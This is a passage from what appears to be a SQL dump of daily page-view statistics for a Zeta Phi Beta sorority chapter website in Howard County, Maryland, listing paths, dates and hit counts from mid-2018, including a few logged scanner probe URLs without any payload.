,('/lgz-celebrates-35-years-service-howard-county-md/','2018-06-20',4,956),('/service/appa/','2018-06-20',7,781),('/?wc-ajax=get_refreshed_fragments','2018-06-20',11,6),('/history/','2018-06-20',5,190),('/scholarship/','2018-06-20',4,797),('/service/','2018-06-20',14,247),('/service/breakfastonthego/','2018-06-20',3,772),('/service/youth/','2018-06-20',4,738),('/service/zen/','2018-06-20',4,786),('/event/ellicott-city-relief-fund/','2018-06-20',2,1280),('/lgz-launches-new-college-preparation-workshops/','2018-06-20',3,1243),('/history','2018-06-20',1,190),('/scholarship','2018-06-20',1,797),('/service/youth','2018-06-20',1,738),('/scholarship/recommendation/','2018-06-20',1,1170),('/scholarship/application/','2018-06-20',1,804),('/ts_teams/kalima-alawode/','2018-06-20',2,888),('/ts_teams/josephine-gross/','2018-06-20',1,1232),('/','2018-06-21',46,6),('/membership/','2018-06-21',2,576),('/?wc-ajax=get_refreshed_fragments','2018-06-21',4,6),('/service/appa/','2018-06-21',3,781),('/service/','2018-06-21',10,247),('/service/zen/','2018-06-21',1,786),('/history/','2018-06-21',3,190),('/?wc-ajax=get_refreshed_fragments','2018-06-22',9,6),('/','2018-06-22',42,6),('/service/','2018-06-22',6,247),('/service/appa/','2018-06-22',9,781),('/scholarship/','2018-06-22',1,797),('/event/ellicott-city-relief-fund/','2018-06-22',1,1280),('/service/youth/','2018-06-22',2,738),('/service/breakfastonthego/','2018-06-22',1,772),('/history/','2018-06-22',1,190),('/ts_teams/kristin-clark/','2018-06-22',1,883),('/ts_teams/tamika-r-daniels/','2018-06-22',1,814),('/','2018-06-23',41,6),('/?wc-ajax=get_refreshed_fragments','2018-06-23',7,6),('/service/appa/','2018-06-23',5,781),('/service/','2018-06-23',7,247),('/service/youth/','2018-06-23',1,738),('/event/ellicott-city-relief-fund/','2018-06-23',1,1280),('/?up_auto_log=true','2018-06-23',2,6),('/history/','2018-06-23',1,190),('/service/','2018-06-24',11,247),('/?wc-ajax=get_refreshed_fragments','2018-06-24',10,6),('/','2018-06-24',48,6),('/service/appa/','2018-06-24',6,781),('/scholarship','2018-06-24',1,797),('/scholarship/','2018-06-24',1,797),('/lgz-celebrates-35-years-service-howard-county-md','2018-06-24',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2018-06-24',2,956),('/history','2018-06-24',1,190),('/service/youth','2018-06-24',1,738),('/history/','2018-06-24',2,190),('/service/youth/','2018-06-24',2,738),('/service/breakfastonthego/','2018-06-24',1,772),('/service/zen/','2018-06-24',1,786),('/','2018-06-25',34,6),('/service/appa/','2018-06-25',3,781),('/?wc-ajax=get_refreshed_fragments','2018-06-25',7,6),('/ts_teams/linda-brigmon/','2018-06-25',1,886),('/history/','2018-06-25',1,190),('/','2018-06-26',79,6),('/service/appa/','2018-06-26',6,781),('/?wc-ajax=get_refreshed_fragments','2018-06-26',14,6),('/history/','2018-06-26',12,190),('/lgz-launches-new-college-preparation-workshops/','2018-06-26',1,1243),('/service/','2018-06-26',1,247),('/scholarship/','2018-06-26',2,797),('/','2018-06-27',39,6),('/membership/','2018-06-27',1,576),('/service/appa/','2018-06-27',5,781),('/?wc-ajax=get_refreshed_fragments','2018-06-27',11,6),('/history/','2018-06-27',3,190),('/ts_teams/angela-jefferson/','2018-06-27',1,874),('/scholarship/','2018-06-27',1,797),('/service/youth/','2018-06-27',2,738),('/','2018-06-28',65,6),('/service/appa/','2018-06-28',5,781),('/?wc-ajax=get_refreshed_fragments','2018-06-28',13,6),('/service/youth/','2018-06-28',5,738),('/service/breakfastonthego/','2018-06-28',2,772),('/service/zen/','2018-06-28',2,786),('/scholarship/','2018-06-28',3,797),('/history/','2018-06-28',3,190),('/service/','2018-06-28',1,247),('/ts_teams/gloria-sanders/','2018-06-28',1,865),('/event/ellicott-city-relief-fund/','2018-06-28',1,1280),('/?wc-ajax=get_refreshed_fragments','2018-06-29',11,6),('/','2018-06-29',37,6),('/service/appa/','2018-06-29',5,781),('/scholarship/','2018-06-29',1,797),('/','2018-06-30',47,6),('/?up_auto_log=true','2018-06-30',2,6),('/scholarship/recommendation/','2018-06-30',1,1170),('/scholarship/','2018-06-30',3,797),('/service/appa/','2018-06-30',8,781),('/?wc-ajax=get_refreshed_fragments','2018-06-30',12,6),('/history/','2018-06-30',4,190),('/scholarship/','2018-07-01',4,797),('/','2018-07-01',69,6),('/?wc-ajax=get_refreshed_fragments','2018-07-01',11,6),('/service/appa/','2018-07-01',7,781),('/service/','2018-07-01',3,247),('/history/','2018-07-01',3,190),('/service/breakfastonthego/','2018-07-01',2,772),('/service/youth/','2018-07-01',2,738),('/ts_teams/josephine-gross/','2018-07-01',2,1232),('/ts_teams/oretta-timmons/','2018-07-01',2,1230),('/ts_teams/yasmine-allen/','2018-07-01',2,1228),('/ts_teams/jelani-dula/','2018-07-01',2,1226),('/ts_teams/christopher-flowers/','2018-07-01',2,1224),('/ts_teams/journey-mcmillan/','2018-07-01',2,1222),('/ts_teams/nicholas-claud/','2018-07-01',2,1220),('/','2018-07-02',65,6),('/history/','2018-07-02',5,190),('/scholarship/','2018-07-02',3,797),('/service/','2018-07-02',4,247),('/service/appa/','2018-07-02',7,781),('/service/breakfastonthego/','2018-07-02',3,772),('/service/youth/','2018-07-02',3,738),('/service/zen/','2018-07-02',3,786),('/event/ellicott-city-relief-fund/','2018-07-02',3,1280),('/lgz-launches-new-college-preparation-workshops/','2018-07-02',2,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-02',4,956),('/scholarship/soror-conway1/','2018-07-02',1,1179),('/scholarship/lgzscholarshipreleaseform/','2018-07-02',2,1173),('/ts_teams/josephine-gross/','2018-07-02',3,1232),('/ts_teams/oretta-timmons/','2018-07-02',3,1230),('/ts_teams/yasmine-allen/','2018-07-02',3,1228),('/ts_teams/jelani-dula/','2018-07-02',3,1226),('/ts_teams/christopher-flowers/','2018-07-02',3,1224),('/ts_teams/journey-mcmillan/','2018-07-02',3,1222),('/ts_teams/nicholas-claud/','2018-07-02',4,1220),('/ts_teams/cassandra-dorsey/','2018-07-02',1,880),('/ts_teams/nathalia-drew/','2018-07-02',3,1084),('/ts_teams/sandra-hudson/','2018-07-02',1,875),('/ts_teams/lillet-williams-2/','2018-07-02',3,824),('/membership','2018-07-02',1,576),('/ts_teams/kathy-ball/','2018-07-02',2,887),('/ts_teams/jontue-sumler/','2018-07-02',1,862),('/ts_teams/michele-franklin/','2018-07-02',1,877),('/ts_teams/ava-lawson/','2018-07-02',1,872),('/ts_teams/celia-worrell/','2018-07-02',1,860),('/ts_teams/christy-lewis/','2018-07-02',3,818),('/ts_teams/linda-price/','2018-07-02',1,867),('/ts_teams/kalima-alawode/','2018-07-02',3,888),('/ts_teams/dawn-j-kemp/','2018-07-02',1,817),('/membership/','2018-07-02',1,576),('/cause/marchofdimes-2/','2018-07-02',3,90),('/ts_teams/quiyatta-gardner/','2018-07-02',1,876),('/ts_slider/567/','2018-07-02',3,567),('/ts_teams/maya-franklin/','2018-07-02',1,878),('/ts_teams/constance-kinder/','2018-07-02',3,822),('/ts_teams/linda-brigmon/','2018-07-02',2,886),('/ts_teams/shanee-satchell/','2018-07-02',2,820),('/ts_teams/kathy-j-barrett/','2018-07-02',2,819),('/ts_teams/jeaneathia-yerby-crowder/','2018-07-02',2,828),('/download/aarc/','2018-07-02',2,991),('/ts_teams/cherice-daniel-2/','2018-07-02',2,825),('/ts_teams/tamara-curtis/','2018-07-02',3,821),('/cause/march-of-dimes/','2018-07-02',2,1023),('/cause/scholarship/','2018-07-02',2,59),('/ts_teams/crystal-whitaker/','2018-07-02',3,816),('/ts_teams/tracy-irvin/','2018-07-02',2,815),('/ts_teams/tamika-r-daniels/','2018-07-02',2,814),('/ts_teams/lillet-williams/','2018-07-02',1,823),('/ts_teams/gloria-sanders/','2018-07-02',1,865),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2018-07-02',1,689),('/?wc-ajax=get_refreshed_fragments','2018-07-02',7,6),('/scholarship/recommendation/','2018-07-02',1,1170),('/','2018-07-03',69,6),('/?wc-ajax=get_refreshed_fragments','2018-07-03',6,6),('/index.php','2018-07-03',2,6),('/scholarship','2018-07-03',1,797),('/scholarship/','2018-07-03',3,797),('/','2018-07-04',59,6),('/service/appa/','2018-07-04',6,781),('/?wc-ajax=get_refreshed_fragments','2018-07-04',11,6),('/history/','2018-07-04',2,190),('/scholarship/','2018-07-05',1,797),('/?wc-ajax=get_refreshed_fragments','2018-07-05',9,6),('/','2018-07-05',49,6),('/service/appa/','2018-07-05',6,781),('/service/youth/','2018-07-05',2,738),('/service/','2018-07-05',1,247),('/service/breakfastonthego/','2018-07-05',1,772),('/event/ellicott-city-relief-fund/','2018-07-05',1,1280),('/download/aarc/','2018-07-05',1,991),('/history/','2018-07-05',1,190),('/','2018-07-06',59,6),('/service/appa/','2018-07-06',7,781),('/?wc-ajax=get_refreshed_fragments','2018-07-06',16,6),('/history/','2018-07-06',3,190),('/scholarship/','2018-07-06',2,797),('/scholarship/application/','2018-07-06',1,804),('/scholarship/recommendation/','2018-07-06',1,1170),('/service/breakfastonthego/','2018-07-06',2,772),('/service/zen/','2018-07-06',2,786),('/ts_teams/w-ruth-conway/','2018-07-06',1,881),('/service/youth/','2018-07-06',2,738),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-06',1,956),('/lgz-launches-new-college-preparation-workshops/','2018-07-06',1,1243),('/service/','2018-07-06',1,247),('/event/ellicott-city-relief-fund/','2018-07-06',1,1280),('/','2018-07-07',51,6),('/service/appa/','2018-07-07',6,781),('/?wc-ajax=get_refreshed_fragments','2018-07-07',13,6),('/history/','2018-07-07',4,190),('/service/breakfastonthego/','2018-07-07',4,772),('/service/youth/','2018-07-07',2,738),('/scholarship/','2018-07-07',1,797),('/','2018-07-08',56,6),('/service','2018-07-08',1,247),('/service/','2018-07-08',2,247),('/download/aarc/','2018-07-08',2,991),('/service/appa/','2018-07-08',5,781),('/?wc-ajax=get_refreshed_fragments','2018-07-08',11,6),('/service/youth','2018-07-08',1,738),('/service/youth/','2018-07-08',1,738),('/scholarship','2018-07-08',1,797),('/scholarship/','2018-07-08',1,797),('/lgz-celebrates-35-years-service-howard-county-md','2018-07-08',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-08',1,956),('/history','2018-07-08',1,190),('/history/','2018-07-08',4,190),('/','2018-07-09',46,6),('/?wc-ajax=get_refreshed_fragments','2018-07-09',8,6),('/history/','2018-07-09',2,190),('/index.php','2018-07-09',2,6),('/service/appa/','2018-07-09',4,781),('/?wc-ajax=get_refreshed_fragments','2018-07-10',14,6),('/','2018-07-10',47,6),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-10',2,956),('/service/appa/','2018-07-10',5,781),('/service/','2018-07-10',1,247),('/download/constitution-by-laws/?_nonce=4d44d98bfb&id=989','2018-07-10',2,989),('/','2018-07-11',59,6),('/service/','2018-07-11',2,247),('/service/appa/','2018-07-11',5,781),('/?wc-ajax=get_refreshed_fragments','2018-07-11',4,6),('/service/zen/','2018-07-11',1,786),('/history/','2018-07-11',1,190),('/event/ellicott-city-relief-fund/','2018-07-11',1,1280),('/service/breakfastonthego/','2018-07-11',1,772),('/service/youth/','2018-07-11',1,738),('/lgz-launches-new-college-preparation-workshops/','2018-07-11',1,1243),('/scholarship/','2018-07-11',1,797),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-11',1,956),('/scholarship/lgzscholarshipreleaseform/','2018-07-11',1,1173),('/scholarship/soror-conway1/','2018-07-11',1,1179),('/ts_teams/jelani-dula/','2018-07-11',1,1226),('/ts_teams/oretta-timmons/','2018-07-11',1,1230),('/ts_teams/josephine-gross/','2018-07-11',1,1232),('/ts_teams/yasmine-allen/','2018-07-11',1,1228),('/scholarship/application/','2018-07-11',1,804),('/scholarship/recommendation/','2018-07-11',1,1170),('/ts_teams/lillet-williams/','2018-07-11',1,823),('/','2018-07-12',82,6),('/ts_teams/gloria-sanders/','2018-07-12',1,865),('/service/appa/','2018-07-12',6,781),('/?wc-ajax=get_refreshed_fragments','2018-07-12',7,6),('/lgz-celebrates-35-years-service-howard-county-md','2018-07-12',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-12',1,956),('/service/appa','2018-07-12',1,781),('/service','2018-07-12',1,247),('/service/','2018-07-12',1,247),('/scholarship/','2018-07-12',1,797),('/','2018-07-13',54,6),('/?wc-ajax=get_refreshed_fragments','2018-07-13',7,6),('/service/appa/','2018-07-13',4,781),('/ts_teams/lillet-williams/','2018-07-13',1,823),('/','2018-07-14',45,6),('/event/ellicott-city-relief-fund/','2018-07-14',1,1280),('/history/','2018-07-14',1,190),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-14',2,956),('/lgz-launches-new-college-preparation-workshops/','2018-07-14',1,1243),('/scholarship/','2018-07-14',2,797),('/service/','2018-07-14',1,247),('/service/breakfastonthego/','2018-07-14',1,772),('/service/appa/','2018-07-14',4,781),('/service/youth/','2018-07-14',1,738),('/service/zen/','2018-07-14',1,786),('/?wc-ajax=get_refreshed_fragments','2018-07-14',5,6),('/','2018-07-15',61,6),('/service/appa/','2018-07-15',6,781),('/?wc-ajax=get_refreshed_fragments','2018-07-15',12,6),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-15',1,956),('/history/','2018-07-15',2,190),('/','2018-07-16',56,6),('/history/','2018-07-16',4,190),('/scholarship/','2018-07-16',1,797),('/service/','2018-07-16',1,247),('/service/appa/','2018-07-16',5,781),('/service/breakfastonthego/','2018-07-16',1,772),('/service/youth/','2018-07-16',1,738),('/service/zen/','2018-07-16',1,786),('/event/ellicott-city-relief-fund/','2018-07-16',1,1280),('/lgz-launches-new-college-preparation-workshops/','2018-07-16',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-16',2,956),('/scholarship/soror-conway1/','2018-07-16',1,1179),('/scholarship/lgzscholarshipreleaseform/','2018-07-16',1,1173),('/ts_teams/josephine-gross/','2018-07-16',1,1232),('/ts_teams/oretta-timmons/','2018-07-16',1,1230),('/ts_teams/yasmine-allen/','2018-07-16',1,1228),('/ts_teams/jelani-dula/','2018-07-16',1,1226),('/ts_teams/christopher-flowers/','2018-07-16',1,1224),('/ts_teams/journey-mcmillan/','2018-07-16',1,1222),('/ts_teams/nicholas-claud/','2018-07-16',1,1220),('/?wc-ajax=get_refreshed_fragments','2018-07-16',11,6),('/download/constitution-by-laws/','2018-07-16',2,989),('/','2018-07-17',63,6),('/history/','2018-07-17',2,190),('/service/appa/','2018-07-17',3,781),('/?wc-ajax=get_refreshed_fragments','2018-07-17',4,6),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-17',2,956),('/service/zen/','2018-07-17',1,786),('/scholarship/','2018-07-17',1,797),('/service/','2018-07-17',1,247),('/event/ellicott-city-relief-fund/','2018-07-17',1,1280),('/service/breakfastonthego/','2018-07-17',1,772),('/lgz-launches-new-college-preparation-workshops/','2018-07-17',1,1243),('/service/youth/','2018-07-17',1,738),('/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','2018-07-17',1,6),('/?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','2018-07-17',1,6),('/membership/','2018-07-17',2,576),('/','2018-07-18',72,6),('/?wc-ajax=get_refreshed_fragments','2018-07-18',11,6),('/service/breakfastonthego/','2018-07-18',1,772),('/service/appa/','2018-07-18',5,781),('/history/','2018-07-18',2,190),('/index.php?d1','2018-07-18',1,6),('/membership/','2018-07-18',1,576),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-18',2,956),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years','2018-07-18',1,689),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2018-07-18',1,689),('/service/youth','2018-07-18',2,738),('/service/youth/','2018-07-18',2,738),('/lgz-celebrates-35-years-service-howard-county-md','2018-07-18',1,956),('/ts_teams/rose-matthews/','2018-07-19',1,870),('/','2018-07-19',56,6),('/lgz-celebrates-35-years-service-howard-county-md','2018-07-19',2,956),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-19',4,956),('/service/appa','2018-07-19',2,781),('/service/appa/','2018-07-19',3,781),('/service','2018-07-19',2,247),('/service/','2018-07-19',2,247),('/?wc-ajax=get_refreshed_fragments','2018-07-19',9,6),('/scholarship/','2018-07-19',1,797),('/ts_teams/lillet-williams/','2018-07-19',1,823),('/ts_teams/linda-price/','2018-07-19',2,867),('/history/','2018-07-19',2,190),('/ts_teams/crystal-whitaker/','2018-07-19',1,816),('/','2018-07-20',71,6),('/event/ellicott-city-relief-fund/','2018-07-20',2,1280),('/history/','2018-07-20',3,190),('/service/appa/','2018-07-20',5,781),('/?wc-ajax=get_refreshed_fragments','2018-07-20',7,6),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-20',4,956),('/lgz-launches-new-college-preparation-workshops/','2018-07-20',2,1243),('/membership/','2018-07-20',2,576),('/service/breakfastonthego/','2018-07-20',1,772),('/service/','2018-07-20',1,247),('/service/zen/','2018-07-20',1,786),('/service/youth/','2018-07-20',1,738),('/','2018-07-21',51,6),('/?wc-ajax=get_refreshed_fragments','2018-07-21',13,6),('/download/aarc/','2018-07-21',1,991),('/service/appa/','2018-07-21',5,781),('/service/zen/','2018-07-21',1,786),('/membership/','2018-07-21',2,576),('/?wc-ajax=get_refreshed_fragments','2018-07-22',9,6),('/','2018-07-22',45,6),('/service/appa/','2018-07-22',4,781),('/service/','2018-07-22',1,247),('/history/','2018-07-22',3,190),('/service/breakfastonthego/','2018-07-22',2,772),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-22',3,956),('/scholarship/','2018-07-22',3,797),('/lgz-launches-new-college-preparation-workshops/','2018-07-22',1,1243),('/service/zen/','2018-07-22',3,786),('/event/ellicott-city-relief-fund/','2018-07-22',1,1280),('/service/youth/','2018-07-22',3,738),('/lgz-celebrates-35-years-service-howard-county-md','2018-07-22',2,956),('/scholarship','2018-07-22',2,797),('/history','2018-07-22',2,190),('/service/youth','2018-07-22',2,738),('/ts_teams/cassandra-dorsey/','2018-07-22',1,880),('/','2018-07-23',55,6),('/service/appa/','2018-07-23',4,781),('/?wc-ajax=get_refreshed_fragments','2018-07-23',9,6),('/service/breakfastonthego/','2018-07-23',1,772),('/membership/','2018-07-23',2,576),('/scholarship/','2018-07-23',1,797),('/','2018-07-24',72,6),('/event/ellicott-city-relief-fund/','2018-07-24',3,1280),('/?wc-ajax=get_refreshed_fragments','2018-07-24',15,6),('/service/appa/','2018-07-24',7,781),('/service/','2018-07-24',3,247),('/scholarship/','2018-07-24',7,797),('/history/','2018-07-24',7,190),('/service/breakfastonthego/','2018-07-24',3,772),('/service/youth/','2018-07-24',2,738),('/service/zen/','2018-07-24',4,786),('/lgz-launches-new-college-preparation-workshops/','2018-07-24',3,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-24',2,956),('/scholarship/soror-conway1/','2018-07-24',2,1179),('/scholarship/lgzscholarshipreleaseform/','2018-07-24',2,1173),('/scholarship/application/','2018-07-24',2,804),('/scholarship/recommendation/','2018-07-24',2,1170),('/ts_teams/josephine-gross/','2018-07-24',2,1232),('/ts_teams/oretta-timmons/','2018-07-24',2,1230),('/ts_teams/yasmine-allen/','2018-07-24',2,1228),('/ts_teams/jelani-dula/','2018-07-24',2,1226),('/ts_teams/christopher-flowers/','2018-07-24',2,1224),('/ts_teams/journey-mcmillan/','2018-07-24',2,1222),('/ts_teams/nicholas-claud/','2018-07-24',2,1220),('/ts_teams/dawn-j-kemp/','2018-07-24',1,817),('/index.php?q=user/password','2018-07-24',1,6),('/?q=user%2Fpassword','2018-07-24',1,6),('/','2018-07-25',88,6),('/service/appa/','2018-07-25',4,781),('/?wc-ajax=get_refreshed_fragments','2018-07-25',14,6),('/history/','2018-07-25',1,190),('/ts_teams/gloria-sanders/','2018-07-25',2,865),('/scholarship/','2018-07-25',1,797),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-25',1,956),('/lgz-launches-new-college-preparation-workshops/','2018-07-25',1,1243),('/user/','2018-07-25',1,547),('/','2018-07-26',65,6),('/?wc-ajax=get_refreshed_fragments','2018-07-26',12,6),('/service/appa/','2018-07-26',9,781),('/service/youth/','2018-07-26',3,738),('/index.php','2018-07-26',1,6),('/scholarship/','2018-07-26',2,797),('/history/','2018-07-26',3,190),('/service/breakfastonthego/','2018-07-26',2,772),('/service/','2018-07-26',2,247),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-26',2,956),('/service/zen/','2018-07-26',1,786),('/lgz-launches-new-college-preparation-workshops/','2018-07-26',1,1243),('/event/ellicott-city-relief-fund/','2018-07-26',1,1280),('/ts_teams/nicholas-claud/','2018-07-26',1,1220),('/','2018-07-27',56,6),('/service/appa/','2018-07-27',7,781),('/?wc-ajax=get_refreshed_fragments','2018-07-27',15,6),('/product/denim-pearls-tickets/','2018-07-27',2,531),('/ts_teams/rose-matthews/','2018-07-27',1,870),('/service/','2018-07-27',1,247),('/scholarship/','2018-07-27',4,797),('/cause/scholarship/','2018-07-27',1,59),('/','2018-07-28',47,6),('/ts_teams/kristin-clark/','2018-07-28',1,883),('/service/appa/','2018-07-28',7,781),('/?wc-ajax=get_refreshed_fragments','2018-07-28',11,6),('/service/zen/','2018-07-28',1,786),('/service/youth/','2018-07-28',1,738),('/','2018-07-29',37,6),('/service/appa/','2018-07-29',7,781),('/?wc-ajax=get_refreshed_fragments','2018-07-29',10,6),('/history/','2018-07-29',3,190),('/scholarship/','2018-07-29',1,797),('/service/','2018-07-29',1,247),('/service/breakfastonthego/','2018-07-29',1,772),('/service/youth/','2018-07-29',1,738),('/service/zen/','2018-07-29',1,786),('/event/ellicott-city-relief-fund/','2018-07-29',1,1280),('/lgz-launches-new-college-preparation-workshops/','2018-07-29',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-29',1,956),('/scholarship/soror-conway1/','2018-07-29',1,1179),('/scholarship/lgzscholarshipreleaseform/','2018-07-29',1,1173),('/ts_teams/josephine-gross/','2018-07-29',1,1232),('/ts_teams/oretta-timmons/','2018-07-29',1,1230),('/ts_teams/yasmine-allen/','2018-07-29',1,1228),('/ts_teams/jelani-dula/','2018-07-29',1,1226),('/ts_teams/christopher-flowers/','2018-07-29',1,1224),('/ts_teams/journey-mcmillan/','2018-07-29',1,1222),('/ts_teams/nicholas-claud/','2018-07-29',1,1220),('/','2018-07-30',55,6),('/service/appa/','2018-07-30',7,781),('/?wc-ajax=get_refreshed_fragments','2018-07-30',8,6),('/event/ellicott-city-relief-fund/','2018-07-30',1,1280),('/download/aarc/','2018-07-30',1,991),('/scholarship/','2018-07-30',2,797),('/service/zen/','2018-07-30',1,786),('/service/','2018-07-30',1,247),('/history/','2018-07-30',1,190),('/service/breakfastonthego/','2018-07-31',2,772),('/service/appa/','2018-07-31',10,781),('/service/','2018-07-31',2,247),('/lgz-celebrates-35-years-service-howard-county-md/','2018-07-31',3,956),('/event/ellicott-city-relief-fund/','2018-07-31',2,1280),('/lgz-launches-new-college-preparation-workshops/','2018-07-31',3,1243),('/service/youth/','2018-07-31',2,738),('/service/zen/','2018-07-31',2,786),('/','2018-07-31',54,6),('/scholarship/','2018-07-31',1,797),('/lgz-launches-new-college-preparation-workshops/feed/','2018-07-31',1,1243),('/scholarship/lgzscholarshipreleaseform/','2018-07-31',2,1173),('/ts_teams/yasmine-allen/','2018-07-31',2,1228),('/?p=956','2018-07-31',1,956),('/ts_teams/oretta-timmons/','2018-07-31',2,1230),('/ts_teams/nicholas-claud/','2018-07-31',2,1220),('/history/','2018-07-31',3,190),('/scholarship/soror-conway1/','2018-07-31',2,1179),('/ts_teams/journey-mcmillan/','2018-07-31',2,1222),('/ts_teams/jelani-dula/','2018-07-31',2,1226),('/ts_teams/josephine-gross/','2018-07-31',2,1232),('/?p=1243','2018-07-31',1,1243),('/ts_teams/christopher-flowers/','2018-07-31',2,1224),('/?wc-ajax=get_refreshed_fragments','2018-07-31',17,6),('/cause/march-of-dimes/','2018-07-31',2,1023),('/cause/marchofdimes-2/','2018-07-31',2,90),('/ts_teams/constance-kinder/','2018-07-31',2,822),('/ts_teams/jeaneathia-yerby-crowder/','2018-07-31',2,828),('/ts_teams/kathy-j-barrett/','2018-07-31',2,819),('/ts_teams/tamara-curtis/','2018-07-31',2,821),('/cause/scholarship/','2018-07-31',2,59),('/ts_teams/christy-lewis/','2018-07-31',2,818),('/product/denim-pearls-tickets/','2018-07-31',2,531),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2018-07-31',2,689),('/ts_teams/tracy-irvin/','2018-07-31',2,815),('/ts_teams/tamika-r-daniels/','2018-07-31',2,814),('/ts_teams/crystal-whitaker/','2018-07-31',2,816),('/ts_teams/cherice-daniel-2/','2018-07-31',2,825),('/ts_slider/567/','2018-07-31',2,567),('/ts_teams/lillet-williams/','2018-07-31',2,823),('/ts_teams/lillet-williams-2/','2018-07-31',2,824),('/ts_teams/shanee-satchell/','2018-07-31',1,820),('/ts_teams/nathalia-drew/','2018-07-31',1,1084),('/ts_teams/kathy-ball/','2018-07-31',1,887),('/ts_teams/kalima-alawode/','2018-07-31',1,888),('/ts_teams/gloria-sanders/','2018-07-31',1,865),('/','2018-08-01',48,6),('/?wc-ajax=get_refreshed_fragments','2018-08-01',11,6),('/service/youth/','2018-08-01',1,738),('/history/','2018-08-01',7,190),('/service/breakfastonthego/','2018-08-01',1,772),('/scholarship/','2018-08-01',4,797),('/ts_teams/tamara-curtis/','2018-08-01',1,821),('/service/appa/','2018-08-01',1,781),('/service/','2018-08-01',1,247),('/','2018-08-02',51,6),('/download/constitution-by-laws/','2018-08-02',5,989),('/history/','2018-08-02',3,190),('/?wc-ajax=get_refreshed_fragments','2018-08-02',5,6),('/service/','2018-08-02',1,247),('/scholarship/','2018-08-02',1,797),('/','2018-08-03',40,6),('/download/constitution-by-laws/','2018-08-03',2,989),('/scholarship/','2018-08-03',1,797),('/?wc-ajax=get_refreshed_fragments','2018-08-03',4,6),('/','2018-08-04',46,6),('/?wc-ajax=get_refreshed_fragments','2018-08-04',4,6),('/history/','2018-08-04',2,190),('/scholarship/recommendation/','2018-08-04',1,1170),('/scholarship/application/','2018-08-04',2,804),('/service/zen/','2018-08-04',1,786),('/lgz-celebrates-35-years-service-howard-county-md/','2018-08-04',1,956),('/scholarship/','2018-08-04',2,797),('/scholarship/lgzscholarshipreleaseform/','2018-08-04',1,1173),('/ts_teams/yasmine-allen/','2018-08-04',1,1228),('/ts_teams/josephine-gross/','2018-08-04',1,1232),('/service/','2018-08-04',1,247),('/scholarship/soror-conway1/','2018-08-04',1,1179),('/ts_teams/jelani-dula/','2018-08-04',1,1226),('/lgz-launches-new-college-preparation-workshops/','2018-08-04',1,1243),('/download/constitution-by-laws/','2018-08-04',1,989),('/','2018-08-05',26,6),('/lgz-launches-new-college-preparation-workshops/','2018-08-05',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-08-05',1,956),('/?wc-ajax=get_refreshed_fragments','2018-08-05',2,6),('/?bataboom','2018-08-05',2,6),('/?wc-ajax=get_refreshed_fragments','2018-08-06',7,6),('/','2018-08-06',55,6),('/history/','2018-08-06',5,190),('/service/appa/','2018-08-06',6,781),('/service/breakfastonthego/','2018-08-06',2,772),('/service/zen/','2018-08-06',1,786),('/service/youth/','2018-08-06',1,738),('/scholarship/','2018-08-06',1,797),('/lgz-celebrates-35-years-service-howard-county-md/','2018-08-06',3,956),('/lgz-launches-new-college-preparation-workshops/','2018-08-06',1,1243),('/?es=subscribe','2018-08-06',1,6),('/ts_teams/dawn-j-kemp/','2018-08-06',1,817),('/scholarship/','2018-08-07',1,797),('/?wc-ajax=get_refreshed_fragments','2018-08-07',15,6),('/','2018-08-07',70,6),('/service/youth/','2018-08-07',2,738),('/service/zen/','2018-08-07',1,786),('/history/','2018-08-07',1,190),('/service/appa/','2018-08-07',1,781),('/service/breakfastonthego/','2018-08-07',2,772),('/','2018-08-08',53,6),('/scholarship/','2018-08-08',5,797),('/?wc-ajax=get_refreshed_fragments','2018-08-08',14,6),('/history/','2018-08-08',5,190),('/service/','2018-08-08',1,247),('/service/breakfastonthego/','2018-08-08',1,772),('/service/youth/','2018-08-08',1,738),('/service/appa/','2018-08-08',2,781),('/scholarship/application/','2018-08-08',1,804),('/','2018-08-09',60,6),('/?wc-ajax=get_refreshed_fragments','2018-08-09',8,6),('/lgz-launches-new-college-preparation-workshops/','2018-08-09',2,1243),('/scholarship/','2018-08-09',1,797),('/ts_teams/cherice-daniel-2/','2018-08-09',1,825),('/lgz-celebrates-35-years-service-howard-county-md/','2018-08-09',1,956),('/service/breakfastonthego/','2018-08-09',1,772),('/service/','2018-08-09',1,247),('/service/zen/','2018-08-09',1,786),('/service/youth/','2018-08-09',1,738),('/service/appa/','2018-08-09',1,781),('/history/','2018-08-09',1,190),('/event/ellicott-city-relief-fund/','2018-08-09',1,1280),('/','2018-08-10',50,6),('/?wc-ajax=get_refreshed_fragments','2018-08-10',13,6),('//?up_auto_log=true','2018-08-10',1,6),('/?up_auto_log=true','2018-08-10',1,6),('/scholarship/','2018-08-10',2,797),('/service/appa/','2018-08-10',2,781),('/download/constitution-by-laws/','2018-08-10',3,989),('/','2018-08-11',48,6),('/history/','2018-08-11',6,190),('/?wc-ajax=get_refreshed_fragments','2018-08-11',9,6),('/','2018-08-12',96,6),('/?wc-ajax=get_refreshed_fragments','2018-08-12',16,6),('/service/','2018-08-12',2,247),('/history/','2018-08-12',4,190),('/scholarship/','2018-08-12',1,797),('/service/appa/','2018-08-12',1,781),('/service/breakfastontheg